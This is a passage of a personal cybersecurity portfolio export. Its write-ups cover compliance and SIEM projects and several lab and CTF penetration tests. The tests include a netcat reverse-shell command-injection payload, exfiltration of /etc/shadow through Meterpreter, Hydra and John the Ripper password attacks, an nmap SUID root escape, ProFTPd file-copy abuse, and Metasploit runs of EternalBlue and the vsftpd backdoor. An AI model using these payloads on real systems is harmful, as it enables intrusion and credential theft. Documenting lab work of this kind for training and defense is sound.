[{"title":"Regulatory Compliance \u0026 Secure System Architecture (NIST/ISO 27001)","content":"Objective: To architect a secure, compliant SaaS environment aligned with ISO 27001 and the NIST Cybersecurity Framework.\n1. The Vulnerability: Regulatory \u0026amp; Infrastructure Gaps SaaS platforms lacking a structured security framework face high risks of data breaches and non-compliance fines. Without Identity and Access Management (IAM) and encrypted data handling, sensitive client data and PII (Personally Identifiable Information) are exposed to unauthorized system changes and data leakage.\n2. Technical Execution: Layered Defense-in-Depth I designed a compliance-ready infrastructure utilizing cloud-native security controls on AWS/Azure. This architecture incorporates Zero Trust principles, ensuring that every user and API call is verified, while sensitive data is protected using high-grade encryption standards.\nComponent Value Purpose Frameworks ISO 27001 / NIST CSF Standards used for governance and risk management. Access Control RBAC / MFA Enforcing the Principle of Least Privilege across roles. Data Protection AES-256 / TLS 1.2+ Securing data at rest and in transit. Network Security VPC Isolation / WAF Segmenting Dev, Staging, and Production environments. 3. Execution Workflow Risk Management: Conducted continuous risk assessments and categorized assets into Public, Internal, Sensitive, and Critical tiers. IAM Implementation: Established Role-Based Access Control (Admin, Analyst, Client) and mandated Multi-Factor Authentication for all system access points. Secure Engineering: Segmented the network environment to isolate production traffic and implemented Web Application Firewalls (WAF) to block edge threats. Incident Response Framework: Designed a 6-step framework (Detect, Analyze, Contain, Eradicate, Recover, Review) with automated ticket creation for rapid recovery. 4. Key Configuration # Example: Enforcing TLS 1.2 minimum on a secure endpoint # Ensuring transport security for NIST/ISO compliance ssl_protocols TLSv1.2 TLSv1.3; ssl_ciphers \u0026#39;ECDHE-ECDSA-AES256-GCM-SHA384:ECDHE-RSA-AES256-GCM-SHA384\u0026#39;; 5. Evidence of Work RESOURCES_NODE_01 Caption: Discovery phase showing the strategic mapping of access control, cryptography, and monitoring to global standards.\nRESOURCES_NODE_01 Caption: Results/Impact phase demonstrating the structured automation of mitigation triggers and post-incident review cycles.\n6. Professional Impact Implementing this architecture ensures System Integrity and user trust by aligning technical controls with international regulations. I provided a \u0026ldquo;Website Risk Score\u0026rdquo; and \u0026ldquo;Compliance Readiness Score\u0026rdquo; as actionable intelligence for clients. This project proves that Revolus is not just a tool but a secure, compliant ecosystem that safeguards the Confidentiality and Availability of the modern web.\n","permalink":"https://xblankzgap.github.io/cyber-portfolio/posts/regulatory-compliance-nist-iso/","summary":"Objective: To architect a secure, compliant SaaS environment aligned with ISO 27001 and the NIST Cybersecurity Framework.\n","tags":["Compliance","NIST","ISO 27001","Secure Architecture"],"categories":["Security Operations (SOC) \u0026 Incident Response"],"tools":["ISO 27001","NIST CSF","RBAC","VPC","WAF"]},{"title":"Web-to-System Pivot via Command Injection","content":"Objective: To exploit a Command Injection vulnerability in a web application to bypass input filters and establish a persistent Remote Shell.\n1. The Vulnerability: Improper Input Validation The target was a web-based \u0026ldquo;Network Diagnostic Tool\u0026rdquo; designed to ping IP addresses. By analyzing the application’s behavior, I identified that it was passing user-supplied input directly to the system shell without proper sanitization. This allowed for Command Chaining, where a legitimate command is followed by a malicious one.\n2. Technical Execution: Bypassing Filters Initial attempts to use the semicolon (;) separator were blocked by the application\u0026rsquo;s basic \u0026ldquo;Sanity Check.\u0026rdquo; I successfully bypassed this restriction by using the Pipe (|) operator, which redirected the command flow to the system\u0026rsquo;s sh (shell) environment.\nComponent Value Purpose Exploit Vector Web Input Field (Ping) The entry point for the attack. Payload `127.0.0.1 | nc [Attacker_IP] [Port] -e /bin/sh` Execution of the attack string. Listener Netcat (nc -lvp) The \u0026ldquo;Ear\u0026rdquo; on Kali waiting for the connection. Target User www-data The service account running the web server. 3. Execution Workflow Listener Initialization: I opened a listening port on my Kali machine using Netcat to intercept the incoming connection. Payload Injection: I entered the malicious string into the web form. This told the server: \u0026ldquo;Ping yourself, but then open a connection to Sophy\u0026rsquo;s Kali machine and give her a terminal.\u0026rdquo; Connection Capture: The server executed the command, and a Reverse Shell was established. Shell Stabilization: To convert the \u0026ldquo;dumb\u0026rdquo; shell into a functional terminal, I utilized a Python PTY spawn trick to gain an interactive Bash prompt. 4. Key Commands Used On Kali: nc -lvp 4444 (To wait for the server\u0026rsquo;s call). In Web Box: 127.0.0.1 | nc 192.168.56.1 4444 -e /bin/sh (The \u0026ldquo;Phone Home\u0026rdquo; command). In Reverse Shell: python -c 'import pty; pty.spawn(\u0026quot;/bin/bash\u0026quot;)' (To stabilize the terminal). RESOURCES_NODE_01 Caption: Demonstrating the successful bypass of input validation to execute system commands through a web interface.\nRESOURCES_NODE_01 Caption: Establishing a persistent Reverse Shell and upgrading to a fully interactive TTY session.\n5. Professional Impact This project demonstrates Lateral Movement. It shows that even if a server is patched at the OS level, a single vulnerable web form can provide a gateway to the internal network. By upgrading the shell using Python, I proved my ability to maintain a stable \u0026ldquo;Command and Control\u0026rdquo; (C2) presence on a target, which is essential for deep-penetration testing.\n","permalink":"https://xblankzgap.github.io/cyber-portfolio/posts/web-to-system-pivot-reverse-shell/","summary":"Objective: To exploit a Command Injection vulnerability in a web application to bypass input filters and establish a persistent Remote Shell.\n","tags":["Command Injection","Web Security","Privilege Escalation"],"categories":["Security Operations (SOC) \u0026 Incident Response"],"tools":[]},{"title":"Post-Exploitation \u0026 Sensitive Data Exfiltration","content":"Objective: To leverage administrative access to extract the system\u0026rsquo;s \u0026ldquo;Shadow\u0026rdquo; file, demonstrating the ability to harvest encrypted credentials for offline analysis.\n1. The Post-Exploitation Phase Once the initial shell was established on the target (192.168.56.101), the focus shifted to Data Exfiltration. In Linux environments, the most critical file for an attacker is /etc/shadow, which contains the encrypted password hashes for every user on the system.\n2. Technical Challenges \u0026amp; Solutions During the session, I encountered a platform-specific limitation where the standard Metasploit priv extension (designed for Windows) was unavailable for this Linux target. I successfully adapted by utilizing native Linux commands to bypass the tool\u0026rsquo;s limitations.\nTarget File Permission Required Data Content /etc/passwd Read (All Users) Usernames and UID information. /etc/shadow Root Only Encrypted password hashes and salt. 3. Execution Workflow Identity Verification: Confirmed administrative status by executing whoami (Result: root). Bypassing Tool Limitations: Instead of relying on automated \u0026ldquo;hashdump\u0026rdquo; scripts, I manually accessed the sensitive file structure. File Read \u0026amp; Capture: Used the cat command to display the contents of the shadow file directly in the terminal for manual capture. Secure Download: Utilized the Meterpreter download command to pull the file from the victim\u0026rsquo;s infrastructure to my local Kali workspace for evidence preservation. 4. Key Commands Used getuid: To verify the current session\u0026rsquo;s privilege level (User: 0 / Root). cat /etc/shadow: To read the encrypted password store. download /etc/shadow /home/sophy/Desktop/shadow_loot.txt: To exfiltrate the data to a secure local directory. RESOURCES_NODE_01 Caption: Manual exfiltration of the Linux shadow file, revealing encrypted user credentials.\nRESOURCES_NODE_01 Caption: Utilizing Meterpreter\u0026rsquo;s transport capabilities to securely transfer sensitive data from the target to the attacker\u0026rsquo;s workstation.\n5. Professional Impact This project highlights a \u0026ldquo;Pivot-Mindset\u0026rdquo;—the ability to troubleshoot technical hurdles (like unsupported extensions) and still achieve the objective using core operating system knowledge. By successfully extracting the /etc/shadow file, I demonstrated the final stage of a system compromise: the theft of \u0026ldquo;Identities,\u0026rdquo; which could lead to further lateral movement across the entire corporate network.\n","permalink":"https://xblankzgap.github.io/cyber-portfolio/posts/post-exploitation-data-exfiltration/","summary":"Objective: To leverage administrative access to extract the system\u0026rsquo;s \u0026ldquo;Shadow\u0026rdquo; file, demonstrating the ability to harvest encrypted credentials for offline analysis.\n","tags":["Post-Exploitation","Lateral Movement","Linux","Exfiltration"],"categories":["Security Operations (SOC) \u0026 Incident Response"],"tools":[]},{"title":"Fowsniff — Credential Harvesting \u0026 Password Cracking","content":"Objective: To exfiltrate and crack leaked credentials from unencrypted data sources to perform authenticated service attacks.\n1. The Vulnerability: Information Disclosure (Credential Leak) The target was found to have a critical information disclosure vulnerability where internal communication logs (emails) were accessible via unauthenticated network shares. These logs contained a dump of MD5-hashed credentials. This represents a fatal breakdown of Confidentiality, as any network participant could harvest the identity store without direct exploitation of a service flaw.\n2. Technical Execution: Brute Force \u0026amp; Cryptanalysis I utilized John the Ripper (JtR) to perform an offline dictionary attack against the exfiltrated MD5 hashes. Once recovered, these plaintext credentials were used as the primary authentication vector for secondary services (POP3/IMAP), demonstrating the cascading impact of a single data leak on organizational security.\nComponent Value Purpose Data Source SMB Share (Unauthenticated) The source of the leaked credential dump. Hash Type MD5 The insecure algorithm used for initial password storage. Cracking Tool John the Ripper Used for offline password recovery. Attack Pivot Hydra (POP3 Brute Force) Utilizing recovered passwords for service access. 3. Execution Workflow Information Gathering: Scanned for Samba shares using Nmap and exfiltrated email logs from the public directory. Credential Extraction: Cleaned the exfiltrated data to isolate user-hash pairs for systematic cracking. Cryptanalysis: Used John the Ripper to successfully recover plaintext passwords from the MD5 hashes. Service Hijacking: Utilized the recovered credentials in conjunction with Hydra to gain administrative access to the target’s email infrastructure (POP3). 4. Key Commands # Using John the Ripper to crack the exfiltrated MD5 hashes john --format=Raw-MD5 --wordlist=/usr/share/wordlists/rockyou.txt hashes.txt # Using Hydra to verify recovered credentials against the POP3 service hydra -L users.txt -P cracked_passes.txt 10.10.x.x pop3 5. Evidence of Work RESOURCES_NODE_01 Caption: Discovery phase showing the unauthenticated access to sensitive internal email logs.\nRESOURCES_NODE_01 Caption: Results/Impact phase showing the successful recovery of multiple plaintext passwords via John the Ripper.\n6. Professional Impact This project demonstrates the \u0026ldquo;Identity Lifecycle\u0026rdquo; of an attack. I proved that a simple configuration error (open SMB share) leads directly to a total account takeover across separate services (email). To remediate this, I recommended that the organization decommission unencrypted shares and transition to bcrypt or Argon2 for password hashing, ensuring that even if data is leaked, it cannot be readily decrypted by an adversary.\n","permalink":"https://xblankzgap.github.io/cyber-portfolio/posts/fowsniff-credential-harvesting/","summary":"Objective: To exfiltrate and crack leaked credentials from unencrypted data sources to perform authenticated service attacks.\n","tags":["Password Cracking","Credential Harvesting","Information Disclosure","John the Ripper"],"categories":["Penetration Testing \u0026 Vulnerability Assessment"],"tools":["Nmap","Metasploit","John the Ripper","Hydra"]},{"title":"Mr. Robot — Web Exploitation \u0026 System Compromise","content":"Objective: To demonstrate a full-stack compromise, from website reconnaissance and credential harvesting to gaining root-level access on a Linux server.\n1. The Vulnerability: Web-to-System Access Chain The target platform was found to be running a vulnerable WordPress instance with an improperly configured administrative login. By exploiting a combination of Information Disclosure (exposed robots.txt and dictionary files) and brute force, I gained initial access to the web backend, providing a gateway for further system-level pivoting.\n2. Technical Execution: Multi-Layered Exploitation I conducted a tiered attack, beginning with aggressive web reconnaissance using gobuster and wpscan. After gaining a web shell, I exfiltrated password hashes for local users and utilized an insecure SUID bit on the nmap binary to escalate privileges to root.\nComponent Value Purpose Reconnaissance Gobuster / WPScan Identifying hidden directories and CMS vulnerabilities. Exploit Vector WordPress Brute Force Gaining initial administrative access to the web interface. Credential Theft MD5 Hash Cracking Recovering local user passwords from the system files. Privilege Esc Nmap SUID (Interactive) Bypassing local security to gain a root shell. 3. Execution Workflow Information Gathering: Identified critical system information and hideouts in the robots.txt file, including a hidden wordlist and a cryptographic key. Web Hijacking: Performed an automated brute force attack against the WordPress login using the exfiltrated wordlist to gain a web shell. Lateral Movement: Located an encrypted MD5 hash for the user robot and recovered the plaintext password via John the Ripper. Root Escalation: Identified that nmap was configured with the SUID bit, allowing for the execution of an interactive nmap session to spawn a root shell. 4. Key Commands # Brute forcing WordPress login with a customized wordlist wpscan --url http://10.10.x.x --passwords wordlist.txt --usernames Elliot # Escalating privileges via Nmap SUID bit nmap --interactive !sh 5. Evidence of Work RESOURCES_NODE_01 Caption: Discovery phase identifying the WordPress administrative login and user enumeration.\nRESOURCES_NODE_01 Caption: Results/Impact phase showing the successful use of Nmap\u0026rsquo;s interactive mode to gain a root shell.\n6. Professional Impact This project highlights the \u0026ldquo;Compromise Chain\u0026rdquo; where a single web-level failure (weak password) leads to total system takeover. By achieving root access via an insecure SUID binary, I proved that local configuration errors are as dangerous as external vulnerabilities. I recommended that the organization enforce strong password policies for CMS platforms and strictly adhere to the Principle of Least Privilege by removing unnecessary SUID bits from system binaries.\n","permalink":"https://xblankzgap.github.io/cyber-portfolio/posts/mrrobot-web-system-compromise/","summary":"Objective: To demonstrate a full-stack compromise, from website reconnaissance and credential harvesting to gaining root-level access on a Linux server.\n","tags":["WordPress Security","CTF","Privilege Escalation","Reconnaissance"],"categories":["Penetration Testing \u0026 Vulnerability Assessment"],"tools":["WPScan","Nmap","John the Ripper","Nmap Privilege Escalation"]},{"title":"Kenobi — Exploiting NFS Misconfigurations \u0026 Privilege Escalation","content":"Objective: To demonstrate the use of insecure service configurations and SUID binaries to perform cross-protocol exploitation and gain root access.\n1. The Vulnerability: Insecure Service Configuration This target exhibited multiple critical misconfigurations, including an insecure Network File System (NFS) share and a vulnerable ProFTPd service (v1.3.5) susceptible to arbitrary file copy vulnerabilities. This allows an attacker to manipulate server-side files via unauthenticated protocol requests, bypassing standard Access Control mechanisms.\n2. Technical Execution: Service Chaining I executed a multi-step attack chain, leveraging Samba for initial information gathering, ProFTPd to exfiltrate private SSH keys to an accessible NFS share, and finally identifying a misconfigured SUID bit on the /usr/bin/menu binary to escalate privileges to root.\nComponent Value Purpose Initial Recon Nmap \u0026ndash;script nfs-showmount Identifying accessible network file shares. Exploit Vector ProFTPd SITE CPFR/CPTO Copying sensitive files (id_rsa) to the NFS share. Auth Vector SSH (Private Key) Gaining initial shell access as a regular user. Privilege Esc SUID (Path Hijacking) Exploiting misconfigured binaries to gain root. 3. Execution Workflow Enumeration: Scanned for Samba shares using Nmap and listed NFS mount points to identify the exploitable infrastructure. File Manipulation: Exploited the ProFTPd SITE CPFR and SITE CPTO commands to copy the user’s private SSH key to the mounted NFS directory. Initial Access: Mounted the NFS share locally, retrieved the SSH key, and established a shell session via SSH. Root Escalation: Identified an SUID binary that executed a system command (curl) without a full path, allowing for Path Hijacking to spawn a root shell. 4. Key Commands # Mounting the insecure NFS share locally mount 10.10.x.x:/var/tmp /mnt/kenobi_nfs # Exploiting the ProFTPd file copy vulnerability SITE CPFR /home/kenobi/.ssh/id_rsa SITE CPTO /var/tmp/id_rsa 5. Evidence of Work RESOURCES_NODE_01 Caption: Identification of unauthenticated NFS shares and vulnerable Samba services.\nRESOURCES_NODE_01 Caption: Successful privilege escalation showing root access gained through SUID binary exploitation.\n6. Professional Impact This project highlights the risk of \u0026ldquo;Service Chaining,\u0026rdquo; where multiple minor misconfigurations lead to a total system compromise. By successfully escalating to root, I proved that System Integrity is only as strong as its weakest service. I recommended that the organization enforce strict protocol-specific access controls and regularly audit system binaries for insecure SUID bit configurations.\n","permalink":"https://xblankzgap.github.io/cyber-portfolio/posts/kenobi-nfs-misconfig-priv-esc/","summary":"Objective: To demonstrate the use of insecure service configurations and SUID binaries to perform cross-protocol exploitation and gain root access.\n","tags":["Linux Security","Privilege Escalation","NFS","ProFTPd"],"categories":["Penetration Testing \u0026 Vulnerability Assessment"],"tools":["Nmap","Netcat","Samba","SUID"]},{"title":"Blue: EternalBlue Exploitation \u0026 Privilege Escalation","content":"Objective: To identify and exploit the MS17-010 (EternalBlue) vulnerability on a legacy Windows target to achieve SYSTEM-level access and credential exfiltration.\n1. The Vulnerability: Remote Code Execution (MS17-010) EternalBlue is a critical vulnerability in the Microsoft SMBv1 server that allows remote attackers to execute arbitrary code via specially crafted packets. This project demonstrates the severe risk posed by legacy protocols and unpatched systems, where a single network request can lead to full system compromise without any user interaction.\n2. Technical Execution: Network-Based Takeover I utilized a systematic approach to identify the target\u0026rsquo;s susceptibility and deploy the EternalBlue exploit. By leveraging the Metasploit Framework, I established a reverse shell and performed post-exploitation tasks to dump system credentials, proving that the lack of system-level patching represents a total failure of the organization\u0026rsquo;s Security Perimeter.\nComponent Value Purpose Discovery Nmap \u0026ndash;script smb-vuln-ms17-010 Confirms vulnerability without crashing the system. Exploitation MS17-010 EternalBlue Deploys the kernel-level exploit to gain access. Escalation SYSTEM Privileges Inherent to the exploit; provides total control. Post-Exploit Mimikatz / Kiwi Used to exfiltrate NTLM hashes and plain-text creds. 3. Execution Workflow Reconnaissance: Performed a stealthy Nmap scan to identify open SMB ports and fingerprint the operating system as Windows 7. Vulnerability Verification: Used a specialized Nmap NSE script to confirm that the target was specifically vulnerable to MS17-010. Exploit Deployment: Configured the windows/smb/ms17_010_eternalblue module with the appropriate payload to match the target\u0026rsquo;s architecture. Credential Harvesting: Once a Meterpreter session was established, I loaded the Kiwi extension to dump the local Security Accounts Manager (SAM) database. 4. Key Structure # Example Metasploit workflow for EternalBlue use exploit/windows/smb/ms17_010_eternalblue set RHOSTS 192.168.1.100 set LHOST 192.168.1.50 exploit 5. Evidence of Work RESOURCES_NODE_01 Caption: Nmap vulnerability scan confirming the target is susceptible to the MS17-010 EternalBlue exploit.\nRESOURCES_NODE_01 Caption: Successful exploitation via Metasploit, establishing a Meterpreter session with SYSTEM-level privileges.\n6. Professional Impact This project underscores the critical importance of a robust Patch Management lifecycle. I demonstrated how a well-known vulnerability can be weaponized in seconds to compromise an entire system. My remediation strategy focuses on Disabling Legacy Protocols (SMBv1) and implementing Network Segmentation to prevent lateral movement, ensuring that even if one system is compromised, the rest of the infrastructure remains secure.\n","permalink":"https://xblankzgap.github.io/cyber-portfolio/posts/eternalblue-windows-exploitation/","summary":"Objective: To identify and exploit the MS17-010 (EternalBlue) vulnerability on a legacy Windows target to achieve SYSTEM-level access and credential exfiltration.\n","tags":["Windows Security","RCE","Privilege Escalation","MS17-010"],"categories":["Penetration Testing \u0026 Vulnerability Assessment"],"tools":["Nmap","Metasploit","Mimikatz","EternalBlue"]},{"title":"Exploiting Infrastructure Vulnerabilities (Backdoor Access)","content":"Objective: To execute a remote command execution (RCE) exploit against a backdoored FTP service to gain unauthorized administrative access to the target host.\n1. Exploitation Strategy The target was identified as running vsftpd 2.3.4, which is susceptible to CVE-2011-2523. This vulnerability allows an attacker to trigger a shell by sending a specific sequence (a smiley face :)) in the FTP username. I utilized the Metasploit Framework (MSF) to automate the delivery and management of this exploit.\n2. Technical Execution \u0026amp; Configuration A critical part of this activity was the precise configuration of the Exploit Payload. I mapped the \u0026ldquo;Local Host\u0026rdquo; (Attacker) and \u0026ldquo;Remote Host\u0026rdquo; (Victim) to ensure the reverse connection bypassed potential networking errors.\nModule Variable Value Purpose Exploit Module unix/ftp/vsftpd_234_backdoor The specific code targeting the vsftpd backdoor. RHOSTS 192.168.56.101 The target infrastructure IP address. LHOST 192.168.56.1 The attacker\u0026rsquo;s IP on the vboxnet0 interface. Payload cmd/unix/interact The method of interacting with the spawned shell. 3. Attack Lifecycle Module Selection: Initialized msfconsole and loaded the vsftpd_234_backdoor module. Environmental Validation: Ran show options to confirm all parameters (IPs and Ports) were correctly set to avoid \u0026ldquo;noisy\u0026rdquo; or failed attempts. Payload Delivery: Executed the exploit command. The framework automatically handled the \u0026ldquo;handshake\u0026rdquo; and identified the triggered shell on Port 6200. Session Establishment: Successfully opened Meterpreter Session 1, providing a high-level command-and-control (C2) interface. 4. Key Commands Used msfconsole: To launch the penetration testing framework. use exploit/unix/ftp/vsftpd_234_backdoor: Loading the specific vulnerability module. set RHOSTS 192.168.56.101: Aiming the exploit at the target. exploit: Running the attack and establishing the connection. RESOURCES_NODE_01 Caption: Configuration of the exploit module parameters prior to execution.\nRESOURCES_NODE_01 Caption: Successful exploitation of CVE-2011-2523, resulting in a remote shell session.\n5. Professional Impact This activity demonstrates the ability to translate \u0026ldquo;Research\u0026rdquo; into \u0026ldquo;Action.\u0026rdquo; By successfully managing a Metasploit session, I proved proficiency in Remote Access Tooling. Furthermore, the transition from an unauthenticated FTP request to a full system shell highlights the catastrophic impact that unpatched, backdoored software can have on an organization’s security posture.\n","permalink":"https://xblankzgap.github.io/cyber-portfolio/posts/infrastructure-exploitation-metasploit/","summary":"Objective: To execute a remote command execution (RCE) exploit against a backdoored FTP service to gain unauthorized administrative access to the target host.\n","tags":["Metasploit","Exploitation","CVE","Vulnerability"],"categories":["Penetration Testing \u0026 Vulnerability Assessment"],"tools":[]},{"title":"Service Enumeration \u0026 Vulnerability Research","content":"Objective: To perform deep-packet inspection and service fingerprinting on a target host to identify exploitable entry points within the infrastructure.\n1. Execution Methodology: The \u0026ldquo;3-Phase Scan\u0026rdquo; A professional scan isn\u0026rsquo;t just one command; it’s a tiered approach to avoid missing hidden services or misidentifying versions.\nPhase 1: Discovery (Ping Sweep) – Confirming the host is alive. Phase 2: Port Scanning (SYN Scan) – Identifying all 65,535 possible TCP \u0026ldquo;doors.\u0026rdquo; Phase 3: Service Fingerprinting (-sV) – Forcing the target to reveal exactly what software and version is running on the open ports. 2. Technical Findings (Port 21 Analysis) During the enumeration of 192.168.56.101, I identified a critical exposure on the File Transfer Protocol (FTP) service.\nAttribute Value Port / Protocol 21 / TCP State Open Service Name ftp Version Identified vsftpd 2.3.4 Risk Level Critical (Backdoor Vulnerability) 3. Vulnerability Research Upon identifying vsftpd 2.3.4, I performed an offline vulnerability search using the Exploit Database (Exploit-DB) via the searchsploit utility on Kali Linux.\nFinding: The specific version of vsftpd (2.3.4) is documented as containing a malicious backdoor added to the source code by an unauthorized party. Trigger: Sending a :) smiley face in the username triggers the opening of a shell on Port 6200. 4. Key Commands \u0026amp; Tools nmap -T4 -A -v 192.168.56.101: An aggressive scan to pull OS details, service versions, and run default scripts. nmap -p 21 --script ftp-vsftpd-backdoor 192.168.56.101: A targeted script scan to confirm the existence of the specific backdoor before launching an exploit. searchsploit vsftpd 2.3.4: Querying the local Exploit-DB for known vulnerabilities. RESOURCES_NODE_01 Caption: Service version detection confirming the presence of the backdoored vsftpd 2.3.4 service.\nRESOURCES_NODE_01 Caption: Utilizing SearchSploit to map the identified service version to a known critical vulnerability (CVE-2011-2523).\n5. Professional Impact By utilizing Service Fingerprinting, I successfully narrowed down the attack surface from dozens of open ports to a single, high-probability exploit. This phase demonstrates a logical transition from \u0026ldquo;Information Gathering\u0026rdquo; to \u0026ldquo;Vulnerability Assessment,\u0026rdquo; ensuring that the subsequent exploitation phase is precise and effective.\n","permalink":"https://xblankzgap.github.io/cyber-portfolio/posts/service-enumeration-lab/","summary":"Objective: To perform deep-packet inspection and service fingerprinting on a target host to identify exploitable entry points within the infrastructure.\n","tags":["Nmap","Reconnaissance","Enumeration","Services"],"categories":["Penetration Testing \u0026 Vulnerability Assessment"],"tools":[]},{"title":"Network Traffic Analysis \u0026 Incident Response (Wazuh \u0026 PCAP)","content":"Objective: To perform a technical post-mortem analysis of a network intrusion attempt using centralized log management and deep packet inspection.\n1. The Vulnerability: Unauthorized Reconnaissance Network visibility is the cornerstone of defensive security. Without centralized logging, attackers can perform stealthy reconnaissance and lateral movement unnoticed. This project demonstrates the integration of Wazuh (SIEM/XDR) and Wireshark to identify, track, and analyze malicious traffic patterns.\n2. Technical Execution: Forensic Triage I utilized a combination of cloud-based SIEM monitoring and local traffic capture to analyze an active incident. By correlating Wazuh alerts with specific TCP/HTTP streams in a PCAP file, I was able to reconstruct the attacker\u0026rsquo;s methodology, from initial port scanning to attempted directory traversal.\nComponent Value Purpose SIEM Wazuh Cloud Centralized dashboard for real-time alert correlation. Traffic Capture PCAP (Wireshark) Raw data for deep packet inspection and stream follow. Log Source /var/log/auth.log Analyzing SSH brute-force and privilege escalation. Outcome Incident Report Documented findings and remediation steps. 3. Execution Workflow Dashboard Monitoring: Identified a spike in \u0026ldquo;High\u0026rdquo; severity alerts on the Wazuh Cloud dashboard originating from a single external IP. PCAP Extraction: Captured raw network traffic (capture.pcap) during the window of the alert to perform granular analysis. Stream Reconstruction: Followed HTTP and TCP streams in Wireshark to identify the specific payloads used in the attack. Hardening: Updated host-based firewall rules and implemented Fail2Ban based on the forensic evidence gathered. 4. Forensic Evidence (Log Snippet) # Wazuh Alert: Multiple Failed SSH Logins Rule: 5712 (SSHD Brute Force Attempt) Source IP: 192.168.1.150 User: root, admin, support Action: Firewalled via active-response 5. Evidence of Work RESOURCES_NODE_01 Caption: Real-time monitoring in Wazuh Cloud showing the correlation of multiple security events and agent health.\n*Caption: Deep packet inspection (Left) and log correlation (Right) used to identify the specific TTPs of the adversary.* 6. Professional Impact This project demonstrates a mature Incident Response capability. By successfully bridging the gap between high-level SIEM alerts and low-level packet data, I reduced the \u0026ldquo;Mean Time to Detection\u0026rdquo; (MTTD) for network threats. My remediation plan included the deployment of hardened security configurations and automated active-response scripts to neutralize future threats in real-time.\n","permalink":"https://xblankzgap.github.io/cyber-portfolio/posts/log-analysis-incident-response/","summary":"Objective: To perform a technical post-mortem analysis of a network intrusion attempt using centralized log management and deep packet inspection.\n","tags":["Blue Teaming","Incident Response","Log Analysis","Wazuh"],"categories":["Network \u0026 Infrastructure Security"],"tools":["Wazuh Cloud","Wireshark","PCAP Analysis","Linux Logs"]},{"title":"Hybrid SIEM Architecture for SEO \u0026 Security Intelligence","content":"Objective: To design and implement a unified SIEM workflow that integrates Splunk and Microsoft Sentinel to detect SEO-specific threats and automated bot attacks.\n1. The Vulnerability: SEO-Security Blind Spots Traditional security monitoring often ignores SEO-specific signals, leaving platforms vulnerable to Negative SEO attacks, ranking manipulation, and aggressive scrapers that bypass standard WAF rules. This represents a critical risk to Availability and System Integrity, where malicious crawl patterns can de-index legitimate pages or exhaust server resources.\n2. Technical Execution: Unified Log Orchestration I designed a multi-layered ingestion architecture that normalizes disparate data sources—including web server logs (Nginx/Apache), CDN logs, and application events—into a unified \u0026ldquo;SEO + Security Hybrid Schema.\u0026rdquo; This allows for the simultaneous correlation of security events (e.g., brute force) with SEO impact (e.g., crawl anomalies).\nComponent Value Purpose SIEM Integration Splunk / Microsoft Sentinel Centralized log ingestion and advanced correlation. Ingestion Layer API-based Connectors Auto-configuration of SEO and security signal feeds. Detection Engine AI-Driven Behavioral Analysis Distinguishing legitimate SEO bots from malicious scrapers. Response Vector SOAR / Webhook Automation \u0026ldquo;One-click\u0026rdquo; mitigation via Cloudflare or AWS WAF. 3. Execution Workflow Normalization \u0026amp; Enrichment: Standardized incoming logs by unifying timestamps, geolocating IPs, and tagging traffic as SEO_BOT, MALICIOUS_BOT, or USER_BEHAVIOR. Detection Logic: Established predefined rules for sudden crawl spikes and unauthorized file access, enhanced by AI to detect ranking manipulation attempts. Alerting \u0026amp; Severity: Configured a tiered alerting system (Critical to Low) delivered via Revolus UI, Slack, and native SIEM dashboards. Automated Mitigation: Implemented a SOAR-like response layer to automatically block IPs or rate-limit suspicious traffic based on real-time threat scores. 4. Key Structure // Example: Normalizing a log entry into the SEO+Security Hybrid Schema { \u0026#34;timestamp\u0026#34;: \u0026#34;2025-07-25T10:00:00Z\u0026#34;, \u0026#34;source_ip\u0026#34;: \u0026#34;192.168.1.1\u0026#34;, \u0026#34;user_agent\u0026#34;: \u0026#34;Googlebot/2.1\u0026#34;, \u0026#34;traffic_tag\u0026#34;: \u0026#34;SEO_BOT\u0026#34;, \u0026#34;risk_score\u0026#34;: 0.05, \u0026#34;action\u0026#34;: \u0026#34;ALLOW\u0026#34; } 5. Evidence of Work RESOURCES_NODE_01 Caption: Discovery phase showing the end-to-end data flow from web servers to the visualization dashboard.\nRESOURCES_NODE_01 Caption: Results/Impact phase demonstrating the visualization of bot activity maps and incident timelines within the SIEM environment.\n6. Professional Impact This project creates a unique market differentiator by positioning security as a core product feature. I demonstrated how a Security-First SEO Architecture protects rankings and data integrity. By integrating with major cloud-native SIEMs, I ensured the platform meets enterprise-grade Compliance Readiness, protecting both organizational reputation and digital assets.\n","permalink":"https://xblankzgap.github.io/cyber-portfolio/posts/hybrid-siem-architecture/","summary":"Objective: To design and implement a unified SIEM workflow that integrates Splunk and Microsoft Sentinel to detect SEO-specific threats and automated bot attacks.\n","tags":["SIEM","SEO Security","Threat Intelligence","Automation"],"categories":["Network \u0026 Infrastructure Security"],"tools":["Splunk","Microsoft Sentinel","SOAR","AI Detection"]},{"title":"Network Traffic Baselining and Anomaly Detection","content":"Objective: To establish a behavioral baseline for legitimate network traffic and use protocol analysis to isolate potential security threats.\n1. The Vulnerability: Obfuscated Network Activity (CWE-1021) A significant vulnerability in modern networks is the inability to distinguish between legitimate background services and malicious traffic. Attackers often use Domain Spoofing and typosquatting (e.g., googleagmanger.com instead of googlemanager.com) to hide their presence. Without a documented baseline of normal traffic, these subtle anomalies often go unnoticed, allowing malware to maintain persistence and communicate with external servers.\n2. Technical Execution: Protocol Interrogation I conducted a deep-packet analysis using Wireshark to categorize traffic by protocol and destination. By filtering for DNS and HTTPS traffic, I was able to verify the legitimacy of routine queries to known services like Google and Firebase while flagging high-frequency queries to unfamiliar domains.\nComponent Value Purpose Analysis Tool Wireshark Real-time packet capture and deep-packet inspection. Baseline Protocol TLSv1.2 / QUIC Verified encrypted web communication for trusted services. Anomaly Vector DNS CNAME Chaining Identified rotating IP patterns used to evade detection. Environment Personal/Home Network Testing site for live monitoring and traffic differentiation. 3. Execution Workflow Traffic Capture: Initiated a live capture session in Wireshark to monitor all inbound and outbound system traffic. Behavioral Baselining: Identified and documented safe traffic patterns from reputable services like Grammarly and Google. Anomaly Identification: Filtered for DNS queries and identified a cluster of domains (e.g., trasre.com) that exhibited suspicious behavior, such as resolving through multiple IP addresses via Cloudfront and Aliyun CDNs. Impact Verification: Determined that the identified domains were typical of rotating Command-and-Control (C2) infrastructure used for malware distribution. 4. Key Commands # Filter Wireshark traffic to show only DNS queries dns # Filter to identify specific suspicious domain resolutions dns.qry.name contains \u0026#34;aoneroom\u0026#34; # Analyze TLS handshakes for version verification tls.handshake.version == 0x0303 5. Evidence of Work RESOURCES_NODE_01 Caption: Discovery phase showing the identification of suspicious DNS queries for domains like h5-static.aoneroom.com.\nRESOURCES_NODE_01 Caption: Results/Impact phase showing the verification of legitimate encrypted traffic (TLS/QUIC) as part of the baselining process.\n6. Professional Impact This 